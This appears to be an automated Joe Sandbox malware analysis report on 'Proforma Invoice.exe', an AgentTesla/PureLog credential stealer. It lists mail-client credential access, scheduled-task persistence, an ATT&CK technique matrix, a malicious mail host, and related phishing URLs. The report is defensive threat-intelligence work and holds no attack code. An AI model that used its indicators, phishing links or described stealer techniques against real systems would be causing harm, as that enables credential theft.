Source: C:\Users\user\Desktop\Proforma Invoice.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VoAlKljQu.exe PID: 7764, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VoAlKljQu.exe PID: 7764, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Proforma Invoice.exe.3599970.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.25d0894.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2b80898.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.2a00cd0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2fb0ce8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2fb0ce8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2b70880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.5000000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2f72f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2b70880.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.5080000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.29b3ed8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.29b8ef0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.25c087c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.2a00cd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.29c2f08.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2b80898.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1726797038.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686647135.0000000003599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685780768.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1726797038.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689723543.0000000005080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689597695.0000000005000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1726797038.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685780768.0000000002988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685780768.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	211 Security Software Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Proforma Invoice.exe	63%	ReversingLabs	Win32.Spyware.Negasteal
Proforma Invoice.exe	65%	Virustotal		Browse
Proforma Invoice.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\VoAlKljQu.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\VoAlKljQu.exe	63%	ReversingLabs	Win32.Spyware.Negasteal
C:\Users\user\AppData\Roaming\VoAlKljQu.exe	65%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mail.elec-qatar.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	Avira URL Cloud	safe
http://mail.elec-qatar.com	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse
http://www.founder.com.cn/cn	0%	Virustotal		Browse
http://mail.elec-qatar.com	2%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	1%	Virustotal		Browse
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false		high
mail.elec-qatar.com	50.87.139.143	true	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://account.dyn.com/	Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/t	Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Proforma Invoice.exe, VoAlKljQu.exe.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.elec-qatar.com	Proforma Invoice.exe, 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Proforma Invoice.exe, 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.87.139.143	mail.elec-qatar.com	United States		46606	UNIFIEDLAYER-AS-1US	true
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1399273
Start date and time:	2024-02-27 08:26:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Proforma Invoice.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 187 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:26:56	Task Scheduler	Run new task: VoAlKljQu path: C:\Users\user\AppData\Roaming\VoAlKljQu.exe
08:26:54	API Interceptor	8476760x Sleep call for process: Proforma Invoice.exe modified
08:26:56	API Interceptor	28x Sleep call for process: powershell.exe modified
08:26:59	API Interceptor	6562678x Sleep call for process: VoAlKljQu.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
50.87.139.143	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	SHIPPING DOC.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	New order.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Quotation R2100131410.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	z92BankingDetails.exe	Get hash	malicious	AgentTesla	Browse
	z14Paymentslip.exe	Get hash	malicious	AgentTesla	Browse
	PO_0130717.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.RATX-gen.20501.5539.exe	Get hash	malicious	AgentTesla, zgRAT	Browse
	SecuriteInfo.com.Win32.PWSX-gen.27494.29811.exe	Get hash	malicious	AgentTesla, zgRAT	Browse
172.67.74.152	Doc-0113687pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse
	EGF.exe	Get hash	malicious	AgentTesla	Browse
	BCAF23090415-FA-INV.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Mokejimas,jpeg.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Lecture6.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Ziraat Bankasi Swift Mesaji.pdf.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	rScaned_Product_Attached_Document.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	rCompany_Profile.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	https://m.exactag.com/ai.aspx?tc=d9bc40b07205bbd26a23a8d2e6b6b4f9&url=//secureyouerinfos.com/fhffdgg/sdssasas/mygsi/Y2FybGEuZ2luZXJAYXhhY3Rvci5jb20=	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse
	https://c8ke.com/auxxxxpdf	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.elec-qatar.com	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	SHIPPING DOC.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	New order.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	Quotation R2100131410.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	z92BankingDetails.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143
	z14Paymentslip.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143
	PO_0130717.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143
	SecuriteInfo.com.Win32.RATX-gen.20501.5539.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	50.87.139.143
	SecuriteInfo.com.Win32.PWSX-gen.27494.29811.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	50.87.139.143
api.ipify.org	Doc-0113687pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	172.67.74.152
	http://accedii.194-48-251-87.cprapid.com/index.php	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	http://web.logodesign.net/preview/8bf6d88a?device=desktop	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	Arrival Notice.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	NEW PO (PO01-240111).exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	NEW PO (PO01-26022024).exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	EGF.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	BCAF23090415-FA-INV.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	IMG_FIZETES_FEB26_IMG.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	Mokejimas,jpeg.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	https://kgp.xfi.mybluehost.me/wp-content/upgrade/maiil/home2/home/support/net/login.php	Get hash	malicious	Unknown	Browse	50.87.231.172
	Arrival Notice.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.150.204
	https://lookerstudio.google.com/s/pmOrPFC9q6E	Get hash	malicious	HTMLPhisher	Browse	192.185.182.159
	https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=amoreex.com/Encinacapital/%23anJlc3NhQGVuY2luYWNhcGl0YWwuY29t%2F%3Futm_source%3DDatabase%26utm_medium%3DEmail%26utm_campaign%3DLisini%2520eGifts	Get hash	malicious	HTMLPhisher	Browse	108.179.193.93
	https://tracker.club-os.com/campaign/click?99559ms99559gId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=https://blicblac%E3%80%82com/#grhrbmVlbHkuZWRkbGVzdG9uQGFtY25ldHdvcmtzLmNvbQ==??kqysne&buhpvbdd/q4vJwGLrOcjgXKyw/t7FqNJad60pBYUT2uZA8g6vHQqWz//bmVlbHkuZWRkbGVzdG9uQGFtY25ldHdvcmtzLmNvbQ==&https://instagram.com	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse	192.185.148.81
	https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=qaryaconnect.com/content/6f94e370dff0d5fa0ea5bb98441b64c7/alT1ZF/c2FsZXNub0Bjb2dlbnQtcG93ZXIuY29t	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.185.112.131
	IPELLUZ1_2024-02-26_11_26_26.699.zip	Get hash	malicious	Unknown	Browse	192.185.106.74
	payment form.doc.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	50.116.112.104
	ORDER #25376283982.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.150.204
	https://lkp.xxm.mybluehost.me/BV/UI/info/?=ConfiramtioneoXtJ-MYYPfaH1:1bIbB0-M2xC4bXfJ5QXJNpJF7mAmVlmM0Iildhs5221VvLJdP4ooIfTjx	Get hash	malicious	HTMLPhisher	Browse	50.87.219.149
CLOUDFLARENETUS	Quotation Drawing Specification.exe	Get hash	malicious	Remcos	Browse	172.67.200.220
	BBKKOUO PDF.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.177.75
	Doc-0113687pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	172.67.74.152
	http://document-85cc2.web.app	Get hash	malicious	Unknown	Browse	104.26.5.119
	https://docs.google.com/forms/u/0/d/e/1FAIpQLSe7q5ELD0ukHZ7E6KcHXkiDMqI8vRMEd1vxtrUgZ3-pPemPWQ/viewscore?vc=0&c=0&w=1&flr=0&viewscore=AE0zAgD_gSPU3bQwis0na0pzUXbgBAd1xpQtr8HDV7R55sQZ0C5IFM4azxVqGdNtN9k8HUM	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	xZnG1FFx7L.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	104.21.94.2
	https://netorg5340145-my.sharepoint.com/:b:/g/personal/info_curreg_com/EZSUhMT59IlCp8Kk3FQpxOYBrWtNELH-5C2z2AFosN0--g?e=qYrYWh	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://www.ungrbly.cn/	Get hash	malicious	Unknown	Browse	104.18.36.155
